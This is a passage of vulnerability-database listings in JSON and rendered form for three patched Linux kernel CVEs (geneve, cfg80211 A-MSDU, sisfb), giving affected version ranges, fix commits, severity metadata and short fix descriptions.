              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26857",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T17:32:22.775976Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T16:53:14.290Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.648Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e431c3227864b5646601c97f5f898d99472f2914"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/59d2a4076983303f324557a114cfd5c32e1f6b29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c7137900691f5692fe3de54566ea7b30bb35d66c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e77e0b0f2a11735c64b105edaee54d6344faca8a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c0b22568a9d8384fd000cc49acb8f74bde40d1b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/048e16dee1fc609c1c85072ccd70bfd4b5fef6ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ca1ba465e55b9460e4e75dec9fff31e708fec74"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/geneve.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e431c3227864b5646601c97f5f898d99472f2914",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "59d2a4076983303f324557a114cfd5c32e1f6b29",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "c7137900691f5692fe3de54566ea7b30bb35d66c",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "e77e0b0f2a11735c64b105edaee54d6344faca8a",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "c0b22568a9d8384fd000cc49acb8f74bde40d1b5",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "048e16dee1fc609c1c85072ccd70bfd4b5fef6ca",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            },
            {
              "lessThan": "1ca1ba465e55b9460e4e75dec9fff31e708fec74",
              "status": "affected",
              "version": "2d07dc79fe04a43d82a346ced6bbf07bdb523f1b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/geneve.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.310",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.272",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.213",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.152",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.82",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.22",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.310",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.272",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.213",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.152",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.82",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.22",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.10",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngeneve: make sure to pull inner header in geneve_rx()\n\nsyzbot triggered a bug in geneve_rx() [1]\n\nIssue is similar to the one I fixed in commit 8d975c15c0cd\n(\"ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()\")\n\nWe have to save skb-\u003enetwork_header in a temporary variable\nin order to be able to recompute the network_header pointer\nafter a pskb_inet_may_pull() call.\n\npskb_inet_may_pull() makes sure the needed headers are in skb-\u003ehead.\n\n[1]\nBUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n BUG: KMSAN: uninit-value in geneve_rx drivers/net/geneve.c:279 [inline]\n BUG: KMSAN: uninit-value in geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391\n  IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]\n  geneve_rx drivers/net/geneve.c:279 [inline]\n  geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391\n  udp_queue_rcv_one_skb+0x1d39/0x1f20 net/ipv4/udp.c:2108\n  udp_queue_rcv_skb+0x6ae/0x6e0 net/ipv4/udp.c:2186\n  udp_unicast_rcv_skb+0x184/0x4b0 net/ipv4/udp.c:2346\n  __udp4_lib_rcv+0x1c6b/0x3010 net/ipv4/udp.c:2422\n  udp_rcv+0x7d/0xa0 net/ipv4/udp.c:2604\n  ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205\n  ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233\n  NF_HOOK include/linux/netfilter.h:314 [inline]\n  ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254\n  dst_input include/net/dst.h:461 [inline]\n  ip_rcv_finish net/ipv4/ip_input.c:449 [inline]\n  NF_HOOK include/linux/netfilter.h:314 [inline]\n  ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569\n  __netif_receive_skb_one_core net/core/dev.c:5534 [inline]\n  __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648\n  process_backlog+0x480/0x8b0 net/core/dev.c:5976\n  __napi_poll+0xe3/0x980 net/core/dev.c:6576\n  napi_poll net/core/dev.c:6645 [inline]\n  net_rx_action+0x8b8/0x1870 net/core/dev.c:6778\n  __do_softirq+0x1b7/0x7c5 kernel/softirq.c:553\n  do_softirq+0x9a/0xf0 kernel/softirq.c:454\n  __local_bh_enable_ip+0x9b/0xa0 kernel/softirq.c:381\n  local_bh_enable include/linux/bottom_half.h:33 [inline]\n  rcu_read_unlock_bh include/linux/rcupdate.h:820 [inline]\n  __dev_queue_xmit+0x2768/0x51c0 net/core/dev.c:4378\n  dev_queue_xmit include/linux/netdevice.h:3171 [inline]\n  packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n  packet_snd net/packet/af_packet.c:3081 [inline]\n  packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg net/socket.c:745 [inline]\n  __sys_sendto+0x735/0xa10 net/socket.c:2191\n  __do_sys_sendto net/socket.c:2203 [inline]\n  __se_sys_sendto net/socket.c:2199 [inline]\n  __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n  slab_post_alloc_hook mm/slub.c:3819 [inline]\n  slab_alloc_node mm/slub.c:3860 [inline]\n  kmem_cache_alloc_node+0x5cb/0xbc0 mm/slub.c:3903\n  kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n  __alloc_skb+0x352/0x790 net/core/skbuff.c:651\n  alloc_skb include/linux/skbuff.h:1296 [inline]\n  alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6394\n  sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2783\n  packet_alloc_skb net/packet/af_packet.c:2930 [inline]\n  packet_snd net/packet/af_packet.c:3024 [inline]\n  packet_sendmsg+0x70c2/0x9f10 net/packet/af_packet.c:3113\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg net/socket.c:745 [inline]\n  __sys_sendto+0x735/0xa10 net/socket.c:2191\n  __do_sys_sendto net/socket.c:2203 [inline]\n  __se_sys_sendto net/socket.c:2199 [inline]\n  __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:06.505Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e431c3227864b5646601c97f5f898d99472f2914"
        },
        {
          "url": "https://git.kernel.org/stable/c/59d2a4076983303f324557a114cfd5c32e1f6b29"
        },
        {
          "url": "https://git.kernel.org/stable/c/c7137900691f5692fe3de54566ea7b30bb35d66c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e77e0b0f2a11735c64b105edaee54d6344faca8a"
        },
        {
          "url": "https://git.kernel.org/stable/c/c0b22568a9d8384fd000cc49acb8f74bde40d1b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5"
        },
        {
          "url": "https://git.kernel.org/stable/c/048e16dee1fc609c1c85072ccd70bfd4b5fef6ca"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ca1ba465e55b9460e4e75dec9fff31e708fec74"
        }
      ],
      "title": "geneve: make sure to pull inner header in geneve_rx()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26857",
    "datePublished": "2024-04-17T10:17:19.115Z",
    "dateReserved": "2024-02-19T14:20:24.183Z",
    "dateUpdated": "2025-05-04T08:58:06.505Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35937 (GCVE-0-2024-35937)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-11-03 21:55

Title

wifi: cfg80211: check A-MSDU format more carefully

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: check A-MSDU format more carefully If it looks like there's another subframe in the A-MSDU but the header isn't fully there, we can end up reading data out of bounds, only to discard later. Make this a bit more careful and check if the subframe header can even be present.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9eb3bc0973d084423…
	https://git.kernel.org/stable/c/5d7a8585fbb31e88f…
	https://git.kernel.org/stable/c/16da1e1dac23be45e…
	https://git.kernel.org/stable/c/9ad7974856926129f…

Impacted products

Vendor

Product

Version

Linux

Affected: 966d5c2c22edcc0ab3d519af39f91a29329c979a , < 9eb3bc0973d084423a6df21cf2c74692ff05647e (git)
Affected: 6e4c0d0460bd32ca9244dff3ba2d2da27235de11 , < 5d7a8585fbb31e88fb2a0f581b70667d3300d1e9 (git)
Affected: 6e4c0d0460bd32ca9244dff3ba2d2da27235de11 , < 16da1e1dac23be45ef6e23c41b1508c400e6c544 (git)
Affected: 6e4c0d0460bd32ca9244dff3ba2d2da27235de11 , < 9ad7974856926129f190ffbe3beea78460b3b7cc (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:55:02.670Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5d7a8585fbb31e88fb2a0f581b70667d3300d1e9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/16da1e1dac23be45ef6e23c41b1508c400e6c544"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ad7974856926129f190ffbe3beea78460b3b7cc"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35937",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:52.262285Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:14.984Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/util.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9eb3bc0973d084423a6df21cf2c74692ff05647e",
              "status": "affected",
              "version": "966d5c2c22edcc0ab3d519af39f91a29329c979a",
              "versionType": "git"
            },
            {
              "lessThan": "5d7a8585fbb31e88fb2a0f581b70667d3300d1e9",
              "status": "affected",
              "version": "6e4c0d0460bd32ca9244dff3ba2d2da27235de11",
              "versionType": "git"
            },
            {
              "lessThan": "16da1e1dac23be45ef6e23c41b1508c400e6c544",
              "status": "affected",
              "version": "6e4c0d0460bd32ca9244dff3ba2d2da27235de11",
              "versionType": "git"
            },
            {
              "lessThan": "9ad7974856926129f190ffbe3beea78460b3b7cc",
              "status": "affected",
              "version": "6e4c0d0460bd32ca9244dff3ba2d2da27235de11",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/util.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: cfg80211: check A-MSDU format more carefully\n\nIf it looks like there\u0027s another subframe in the A-MSDU\nbut the header isn\u0027t fully there, we can end up reading\ndata out of bounds, only to discard later. Make this a\nbit more careful and check if the subframe header can\neven be present."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:39.754Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9eb3bc0973d084423a6df21cf2c74692ff05647e"
        },
        {
          "url": "https://git.kernel.org/stable/c/5d7a8585fbb31e88fb2a0f581b70667d3300d1e9"
        },
        {
          "url": "https://git.kernel.org/stable/c/16da1e1dac23be45ef6e23c41b1508c400e6c544"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ad7974856926129f190ffbe3beea78460b3b7cc"
        }
      ],
      "title": "wifi: cfg80211: check A-MSDU format more carefully",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35937",
    "datePublished": "2024-05-19T10:10:43.615Z",
    "dateReserved": "2024-05-17T13:50:33.131Z",
    "dateUpdated": "2025-11-03T21:55:02.670Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26777 (GCVE-0-2024-26777)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:01 – Updated: 2026-01-05 10:34

Title

fbdev: sis: Error out if pixclock equals zero

Summary

In the Linux kernel, the following vulnerability has been resolved: fbdev: sis: Error out if pixclock equals zero The userspace program could pass any values to the driver through ioctl() interface. If the driver doesn't check the value of pixclock, it may cause divide-by-zero error. In sisfb_check_var(), var->pixclock is used as a divisor to caculate drate before it is checked against zero. Fix this by checking it at the beginning. This is similar to CVE-2022-3061 in i740fb which was fixed by commit 15cf0b8.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/84246c35ca3420711…
	https://git.kernel.org/stable/c/6db07619d173765bd…
	https://git.kernel.org/stable/c/cd36da760bd1f78c6…
	https://git.kernel.org/stable/c/df6e2088c6f4cad53…
	https://git.kernel.org/stable/c/f329523f6a65c3bbc…
	https://git.kernel.org/stable/c/99f1abc34a6dde248…
	https://git.kernel.org/stable/c/1d11dd3ea5d039c7d…
	https://git.kernel.org/stable/c/e421946be7d9bf545…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 84246c35ca34207114055a87552a1c4289c8fd7e (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6db07619d173765bd8622d63809cbfe361f04207 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < cd36da760bd1f78c63c7078407baf01dd724f313 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < df6e2088c6f4cad539cf67cba2d6764461e798d1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f329523f6a65c3bbce913ad35473d83a319d5d99 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 99f1abc34a6dde248d2219d64aa493c76bbdd9eb (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1d11dd3ea5d039c7da089f309f39c4cd363b924b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < e421946be7d9bf545147bea8419ef8239cb7ca52 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.308 , ≤ 4.19.* (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26777",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-03T18:10:58.840983Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:30.706Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.470Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/84246c35ca34207114055a87552a1c4289c8fd7e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6db07619d173765bd8622d63809cbfe361f04207"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd36da760bd1f78c63c7078407baf01dd724f313"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/df6e2088c6f4cad539cf67cba2d6764461e798d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f329523f6a65c3bbce913ad35473d83a319d5d99"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/99f1abc34a6dde248d2219d64aa493c76bbdd9eb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d11dd3ea5d039c7da089f309f39c4cd363b924b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e421946be7d9bf545147bea8419ef8239cb7ca52"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/sis/sis_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "84246c35ca34207114055a87552a1c4289c8fd7e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "6db07619d173765bd8622d63809cbfe361f04207",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "cd36da760bd1f78c63c7078407baf01dd724f313",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "df6e2088c6f4cad539cf67cba2d6764461e798d1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "f329523f6a65c3bbce913ad35473d83a319d5d99",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "99f1abc34a6dde248d2219d64aa493c76bbdd9eb",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "1d11dd3ea5d039c7da089f309f39c4cd363b924b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "e421946be7d9bf545147bea8419ef8239cb7ca52",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/video/fbdev/sis/sis_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.308",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.308",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
                  "versionStartIncluding": "2.6.12",
